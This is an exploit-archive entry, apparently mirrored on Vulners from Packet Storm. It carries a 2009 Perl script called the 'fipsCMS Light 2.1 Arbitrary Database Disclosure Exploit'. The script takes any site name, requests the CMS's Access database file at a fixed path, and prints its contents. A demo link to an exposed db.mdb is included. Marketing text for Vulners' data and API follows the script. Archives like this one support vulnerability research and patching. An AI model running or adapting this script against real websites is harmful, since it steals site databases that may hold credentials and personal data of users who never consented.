Lucene search
K

fipsCMS Light 2.1 Database Disclosure

🗓️ 01 Jul 2009 00:00:00Reported by d3b4gType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit by d3b4g, accessing db.mdb fil

Code
`#!/usr/bin/perl  
#  
# fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit  
#  
# Exploit by d3b4g  
# script:http://fipsasp.com  
# Demo: http://demo.fipsasp.com/fipsCMS_light/_fipsdb/db.mdb  
# From Tiny little island of maldivies  
#  
#  
#  
#  
#  
use LWP::Simple;  
use LWP::UserAgent;  
  
print "\fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit\n";  
  
print "\t****************************************************************\n";  
print "\t* fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit *\n";  
print "\t* by d3b4g *\n";  
print "\t****************************************************************\n\n\n\n";  
if(@ARGV < 1)  
{  
&help; exit();  
}  
sub help()  
{  
print "[X] Usage : perl $0 site \n";  
print "[X] Exemple : perl $0 www.vuln.com \n";  
}  
($site) = @ARGV;  
print("Please Wait ! Connecting to Server ......\n\n");  
sleep(5);  
$database = "mdb-database/fipsdb/db.mdb";  
my $exploit = "http://" . $site . "/" . $database;  
print("Searching For file ...\n\n");  
sleep(3);  
$sploit=get $exploit;  
if($sploit){  
print("..........................downloading db...........................\n");  
print("$sploit\n");  
}  
else {  
help();  
exit;  
}`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2009 00:00Current
7.4High risk
Vulners AI Score7.4
26